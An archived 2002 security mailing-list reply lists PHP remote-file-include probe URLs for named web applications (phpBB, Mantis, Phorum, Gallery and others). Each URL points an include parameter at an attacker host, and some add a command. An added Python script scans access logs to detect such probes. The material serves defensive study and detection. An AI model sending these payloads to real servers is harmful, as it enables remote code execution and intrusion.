Re: Good practical php attack example

From: Steven M. Christey (coley@linus.mitre.org)
Date: 09/22/02


Date: Sat, 21 Sep 2002 18:46:16 -0400 (EDT)
From: "Steven M. Christey" <coley@linus.mitre.org>
To: zeno@cgisecurity.com


I used the regular expression in my previous post to grab some
concrete PHP-related URLs from about 4 months' worth of email, which
includes various security mailing lists. Many of these URLs come
from a Bugtraq post by Frog Man in June.

/_head.php?_zb_path=http://attacker.example.com
/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attacker.example.com?
/gallery/captionator.php?GALLERY_BASEDIR=http://attacker.example.com
/globals.php3?LangCookie=http://attacker.example.com
/include/msql.php?inc_dir=http://attacker.example.com&ext=txt
/include/mssql7.php?inc_dir=http://attacker.example.com&ext=txt
/include/mysql.php?inc_dir=http://attacker.example.com&ext=txt
/include/oci8.php?inc_dir=http://attacker.example.com&ext=txt
/include/postgres.php?inc_dir=http://attacker.example.com&ext=txt
/include/postgres65.php?inc_dir=http://attacker.example.com&ext=txt
/install.php?phpbb_root_dir=http://attacker.example.com
/mantis/login_page.php?g_meta_include_file=http://attacker.example.com
/page.php?template=http://your-ip/hello.html?
/phorum/admin/actions/del.php?include_path=http://attacker.example.com&cmd=ls
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://attacker.example.com&cmd=ls
/pollensondage.inc.php?app_path=http://attacker.example.com
/user/agora_user.php?inc_dir=http://attacker.example.com&ext=txt
/user/ldap_example.php?inc_dir=http://attacker.example.com&ext=txt
/userlist.php?ME=http://attacker.example.com

- Steve
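Every URL in the list above has the same shape: a query parameter that the target PHP script later hands to include() or require(), set to a URL on a host the attacker controls, so that the server fetches and executes a remote file (with allow_url_fopen on, the PHP 4 default, and register_globals letting request data overwrite the variable). The scanner below is an added example, not code from the original post or from Steve's regular expression: it parses common-log-format access-log lines, decodes each query parameter, and flags any whose value is an http://, https:// or ftp:// URL, rating the hit higher when the parameter name looks like an include path (dir, path, root, inc, template, file). The log lines, the client addresses and the PATH_LIKE_RE heuristic are all constructed for the example.

```python
"""Flag PHP remote-file-include probes in web server access logs.

Added example; the log lines and the name heuristic are assumptions
made for illustration, not taken from the original post.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (common log format), mixing the URL shapes from the
# post above with benign traffic and one legitimate URL-valued parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Sep/2002:18:40:01 -0400] "GET /include/mysql.php?inc_dir=http://attacker.example.com&ext=txt HTTP/1.0" 200 512
203.0.113.5 - - [21/Sep/2002:18:40:02 -0400] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://attacker.example.com&cmd=ls HTTP/1.0" 200 1024
198.51.100.7 - - [21/Sep/2002:18:41:10 -0400] "GET /index.php?page=about HTTP/1.1" 200 2048
198.51.100.7 - - [21/Sep/2002:18:41:11 -0400] "GET /redirect.php?url=http%3A%2F%2Fwww.example.org%2F HTTP/1.1" 302 0
203.0.113.9 - - [21/Sep/2002:18:42:00 -0400] "GET /install.php?phpbb_root_dir=HTTP://attacker.example.com HTTP/1.0" 200 300
"""

# client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# A parameter value that would make include() reach out over the network.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)

# Heuristic (assumption): names like these usually end up in include paths,
# so a remote URL in them is far more suspicious than in, say, a redirect
# target named "url".
PATH_LIKE_RE = re.compile(r'(dir|path|root|inc|include|template|file|base)',
                          re.IGNORECASE)


def classify_query(target):
    """Return (param, decoded value, severity) for each query parameter in a
    request target whose value is a remote URL. Percent-encoding and
    PHP-style array names such as PHORUM[settings_dir] are handled by
    parse_qsl."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_SCHEME_RE.match(value):
            severity = 'high' if PATH_LIKE_RE.search(name) else 'low'
            hits.append((name, value, severity))
    return hits


def scan_log(text):
    """Parse every log line and return one finding per remote-URL parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not common log format; skip rather than guess
        client, when, method, target, status = m.groups()
        for name, value, severity in classify_query(target):
            findings.append({
                'client': client,
                'time': when,
                'path': urlsplit(target).path,
                'param': name,
                'value': value,
                'status': int(status),
                'severity': severity,
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:4} {f['client']:12} {f['path']} {f['param']}={f['value']} ({f['status']})")
```

The fourth sample line shows the main false positive: a redirect parameter legitimately carrying a URL comes out as a 'low' finding, which is why the name heuristic matters when triaging. A 200 status on a 'high' finding does not prove the include succeeded, only that the script ran; confirming requires the PHP source (a variable reaching include() before it is set) or outbound connections from the web server to the named host.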

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com